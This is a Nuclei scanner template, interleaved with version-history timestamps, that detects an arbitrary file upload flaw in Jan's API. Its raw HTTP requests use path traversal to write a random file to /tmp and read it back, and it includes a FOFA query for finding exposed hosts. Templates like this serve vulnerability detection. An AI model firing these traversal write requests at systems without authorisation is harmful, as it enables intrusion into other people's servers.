2024-07-18 10:07:03 +00:00
|
|
|
id: jan-file-upload
|
2024-07-18 07:34:30 +00:00
|
|
|
|
|
|
|
info:
|
2024-07-18 10:07:03 +00:00
|
|
|
name: Jan - Arbitrary File Upload
|
2024-07-18 07:34:30 +00:00
|
|
|
author: pussycat0x
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
|
|
|
|
reference:
|
|
|
|
- https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
|
|
|
|
- https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
|
|
|
|
metadata:
|
|
|
|
fofa-query: icon_hash="-165268926"
|
|
|
|
max-request: 2
|
2024-07-18 10:07:03 +00:00
|
|
|
tags: jan,intrusive,file-upload
|
|
|
|
|
2024-07-18 07:34:30 +00:00
|
|
|
variables:
|
2024-07-18 10:07:03 +00:00
|
|
|
string: "{{to_lower(rand_base(5))}}"
|
2024-07-18 07:34:30 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
2024-07-23 07:08:56 +00:00
|
|
|
POST /v1/app/writeFileSync HTTP/1.1
|
2024-07-18 07:34:30 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
contentType: application/json
|
2024-07-23 07:08:56 +00:00
|
|
|
Content-Type: text/plain;charset=UTF-8
|
2024-07-18 07:34:30 +00:00
|
|
|
Origin: {{RootURL}}
|
|
|
|
|
2024-07-18 10:07:03 +00:00
|
|
|
["/../../../../../tmp/{{string}}.txt","{{randstr}}"]
|
|
|
|
|
2024-07-18 07:34:30 +00:00
|
|
|
- |
|
|
|
|
POST /v1/app/readFileSync HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
contentType: application/json
|
|
|
|
Content-Type: text/plain;charset=UTF-8
|
|
|
|
Origin: {{RootURL}}
|
|
|
|
|
2024-07-18 10:07:03 +00:00
|
|
|
["file:/../../../../../tmp/{{string}}.txt","utf-8"]
|
2024-07-18 07:34:30 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body_2
|
|
|
|
words:
|
2024-07-23 08:25:45 +00:00
|
|
|
- '{{randstr}}'
|
2024-07-18 07:34:30 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-07-23 08:25:45 +00:00
|
|
|
# digest: 4a0a004730450220588386f232e7fd1b2d944debc86e55c0ab9a3b987ab46344021ca95eb4a20148022100cc9ba34700beeebf9427f7d63787d562143f34baf764c1d22f93442c9b932c1c:922c64590222798bb761d5b6d8e72950
|